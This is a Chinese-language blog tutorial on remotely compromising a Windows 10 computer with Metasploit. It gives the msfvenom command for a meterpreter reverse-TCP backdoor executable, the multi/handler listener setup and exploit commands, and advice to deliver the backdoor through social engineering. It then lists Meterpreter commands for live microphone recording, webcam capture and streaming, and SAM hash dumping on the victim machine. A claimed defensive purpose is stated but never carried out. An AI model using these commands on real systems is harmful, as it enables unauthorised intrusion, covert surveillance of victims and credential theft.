使用Metasploit MSFVenom远程入侵计算机– Windows 10黑客

少羽.
少羽.
少羽.
429
文章
88
评论
2019年12月9日20:36:02 2 10,325 1357字阅读4分31秒
广告也精彩

使用Metasploit MSFVenom远程入侵计算机– Windows 10黑客

当涉及到渗透和黑客攻击时,Linux就在那里。Kali Linux是功能最强大的Linux版本之一,为所有渗透测试工具提供了动力。Metasploit是最受欢迎的工具之一,可用于入侵包括计算机,Web服务器甚至手机在内的远程设备。在Metasploit的帮助下,入侵远程计算机并不难。Metasploit是终端命令库程序。对于初学者来说,很难知道命令以及如何执行它们。因此,如果您是新手,则可以学习最常见的Metasploit命令以开始使用。

注意: 向您展示黑客如何侵入远程系统以及如何防止它们。

使用Metasploit MSFVenom远程入侵计算机– Windows 10黑客

要求:

  1. Kali Linux操作系统
  2. Metasploit框架(已在Kali Linux中预构建)
  3. 目标机

黑客入侵Windows 10计算机的演示是在虚拟环境中进行的,这意味着在此过程中不会损害任何实际设备。

如果要在VirtualBox中尝试,则还需要满足以下条件:

  1. 虚拟盒子
  2. Kali Linux VM映像
  3. Windows 10虚拟映像
  4. 目标机

远程入侵计算机的步骤如下:

  • 下载并安装Kali linux。
  • 安装完成后,启动系统并进行升级。只需打开一个终端并输入以下命令:
apt-get upgrade
  • 更新后,运行metasploit。打开终端,然后键入:msfconsole。 
  • 当Metasploit开始时,第一件事就是创建一个后门。输入以下命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.5 -f exe -o /root/Desktop/AnyName.exe

使用Metasploit MSFVenom远程入侵计算机– Windows 10黑客

  • 将LHOST = 10.0.2.5替换为您的内部IP。您可以通过在终端中键入' ifconfig'进行检查。您可以将保存后门的位置更改为任意选择 我是在桌面上创建的

使用Metasploit MSFVenom远程入侵计算机– Windows 10黑客

 

  • 下一步是使用漏洞利用程序。该漏洞处理程序将处理所有后门请求。为此,只需键入以下命令。

 

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

使用Metasploit MSFVenom远程入侵计算机– Windows 10黑客

  • 漏洞利用处理程序准备就绪后,只需设置漏洞利用选项即可。 

使用Metasploit MSFVenom远程入侵计算机– Windows 10黑客

  • 设置侦听主机IP和端口后,只需键入以下命令即可利用。
exploit -j -z

使用Metasploit MSFVenom远程入侵计算机– Windows 10黑客

  • 现在是传播后门的一部分。在这里成为一名社会工程师。只需很少的社会工程学,即可将目标安装在PC上。当有人运行您发送的后门时。会话将在您的Metasploit终端中开始,而您正在…
  • 现在该玩目标设备了。现在,您可以播放受害设备并对其执行任何操作。您可以在远程设备上执行数百种操作。以下是您可以在目标设备上执行的一些最有趣的操作。

远程操作的Meterpreter命令

record_mic

此命令提供您所连接的远程计算机的实时麦克风源。聆听目标的实时对话。

webcam_chat

它启动与目标计算机的视频聊天

webcam_snap

用于从目标设备捕获照片。

webcam_stream

用于从受害者计算机流式传输实时视频。

hashdump

它转储SAM数据库的内容。

您可以检出所有最常见的Metasploit命令和meterpreter有效负载

希望这对您有用,并使您清楚如何使用Metasploit MSFVenom远程入侵计算机。如果您遇到任何问题,请在下面发表评论。

继续阅读
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
广告也精彩
少羽.
  • 本文由 发表于 2019年12月9日20:36:02
  • 除非特殊声明,本站文章均为原创,转载请务必保留本文链接
渗透经验分享之文件操作漏洞拓展 渗透笔记

渗透经验分享之文件操作漏洞拓展

上文分享了注入相关的东西,注入也可以对文件进行操作,本文是对文件操作漏洞的拓展。 文件操作漏洞 文件上传 文件读取 文件写入 文件删除 文件包含 一般java的站点存在文件系列的洞比较多(除了文件包含...
渗透经验分享之SQL注入思路拓展 渗透笔记

渗透经验分享之SQL注入思路拓展

写在文前 从实习到现在,因为从事打点工作的原因,实战经验积累了很多,就想写一些自己在实战中碰到的问题,以及自己的解决方法,因为保密的原因大多数不提供复现环境和截图,权当对渗透思路的一个拓展吧。可能会多...
广告也精彩
匿名

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen:

评论:2   其中:访客  2   博主  0
    • 铭泽博客 铭泽博客 1

      感谢分享

      • 风微凉。 风微凉。 0

        请问为什么我新装的kali Linux 系统使用namp j检测说我的端口全部关闭的?22/TCP可不可以作为监听端口?